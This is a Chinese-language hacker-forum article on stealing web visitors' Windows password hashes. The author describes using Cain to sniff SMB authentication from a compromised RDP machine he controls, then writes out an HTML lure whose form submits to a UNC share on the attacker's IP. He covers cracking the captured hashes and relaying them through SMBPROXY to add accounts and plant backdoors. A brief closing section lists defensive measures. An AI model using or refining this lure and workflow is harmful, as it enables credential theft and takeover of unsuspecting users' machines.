[摘要]自从上次发布了SMBPROXY的测试动画后,就有网友问我:“能否通过网页抓取浏览者的HASH值?”因为SMBPROXY只认可pwdump格式的密码信息,其他格式都不行,所以如果通过构造一个特殊的网页...
自从上次发布了SMBPROXY的测试动画后,就有网友问我:“能否通过网页抓取浏览者的HASH值?”因为SMBPROXY只认可pwdump格式的密码信息,其他格式都不行,所以如果通过构造一个特殊的网页,能够抓取浏览者的HASH值,并能转化为PWDUMP认可的格式,那么我们就有可能完全控制浏览者的机器。
第一次听说XHACKER和HAOWAWA通过网页抓HASH的时候,觉得不太可能,第2天跑到他们论坛里翻了一遍,也没有找到相关的帖子,没办法,只好自己动脑子了。以往获取HASH的方法就是入侵到对方机器里,抓取SAM,然后用LC4暴力破解,还有就是用PWDUMP抓,不过这2种方法需要的条件都比较苛刻。本来想了好久也没有头绪,昨天看到小雨兄写的帖子,里面提到了CAIN这个工具,忽然记起来以前在3389肉鸡上通过IPC到自己机器上拷工具的时候,CAIN的SNIFFER模式就记录下一些SMB会话过程。里面包含TIME,SMB SERVER,CLIENT,USERNAME,DOMAIN,LN HASH,NT HASH,NT SERV-CHALL,LM CLI-CHALL,SESSION KEY以及登陆结果。虽然当时只提交了一次验证过程,可是往往嗅探到很多次SMB会话。考虑到这可能就是问题的突破口,我再次登陆到肉鸡上,并将这次的过程详细记录下来:
先打开自己机器上CAIN的SNIFFER模式。登陆到3389肉鸡上(登陆时用户名是USER,密码是1982),进去后在“开始”--“运行”里填上“\\218.197.248.212\C$" (这里218.197.248.212是我自己机器的IP),很快弹出熟悉的验证框,上面填用户名,下面是对应的密码。虽然这时候我还没填任何资料,不过本地机器上已经嗅探到了12个SMB会话,其中SMB SERVER一栏都是我的IP,CLIENT都是肉鸡的IP,USERMANE的名字则是USER,DOMAIN栏是肉鸡的机器名。这里的12个会话结果都是失败。当我用ADMINISTRATOR(密码是753951,这个用户是我自己机器上的管理员帐号)进入自己C盘的时候,CAIN又嗅探到一个SMB会话过程,用户名是和前面的不同,是ADMINISTRATOR,而这次的登陆结果显示成功。此时我们感兴趣的是前面的12个会话过程是如何建立的,那些嗅到的HASH值破解出来的密码究竟会是什么?我用CAIN把这12个值全部导入CRACKER,选择“TEST PASSWORD”一项,当密码填入1982的时候,显示密码破解成功,虽然这12个会话里的HASH值都不一样,但是实质上密码都是1982。到了这里,可以猜测到WIN2K验证机制如下:当一台WIN2K主机企图访问另外一台WIN2K机器共享资源的时候,会先发出登陆请求,假设此时请求主机上用户名是ABC,密码是123,它会先用ABC(123)尝试登陆远程主机,当发现密码错误不能登陆的时候,再弹出我们常见的验证框,让用户自己填用户名和密码。知道了这个原理,我先用ABC(密码123)登陆到远程主机,再“开始”--“运行”里填“\\218.197.248.212\c$",很快出现了验证框,点击取消,然后在自己机器上建立一个管理员,帐号密码也是ABC(123),此时再重复上面的行为,这次不需要验证,直接进入我的C盘!
为了再次验证自己的想法,假设知道218.197.248.253的ADMINISTRATOR的密码是123456,我把自己ADMINISTRATOR密码改成123456,注销后再登陆,当输入“\\218.197.248.253\C$"时,不需要任何验证过程,也可以直接进入对方硬盘!
既然知道如上的原理,我们可以构造如下的网页
<html>
<title>本网页可以抓取你的HASH</title>
<p><p align=center>
<form action="\\218.197.248.212\c$"><input type="submit" value="点击这里我就可以获取你的HASH值"></form>
</body>
</html>
这里218.197.248.212必须是装了嗅探器的主机。当用户浏览这个网页的时候,一旦提交了按钮事件,就会连接到嗅探机器的某共享资源,而此时浏览者的HASH就会被截取了,我用的是CAIN抓HASH,抓取后可以直接导入CRACKER,然后暴力破解出密码。如果哪位能把这里HASH值转化成PWDUMP格式,都不需要破解,直接利用SMBPROXY加用户,做后门。。。。。。
后记:
这里我给出的只是一个思路,大家可以把这种特殊网页构造得更加完善,这里引用小雨兄的建议,小雨该不会介意吧:
禁用smb服务,最少服务=最大安全,还是不败的神化
如果启动,推荐使用至少ver2的认证,最好是lever3
使用别名帐户,比如user权限的用户,即使被破掉密码,权限低一点总是好的!
定期查看审核日志(细心管理员该做的,看看,有没有可疑的分析)
警惕陌生人的email或者web页面,注意file://url的诱惑
网络的神奇作用吸引着越来越多的用户加入其中,正因如此,网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......,各项技术都需要适时应势,对应发展,这正是网络迅速走向进步的催化剂。
关键词:非主流入侵之会话劫持winnt/2k HASH的深入研究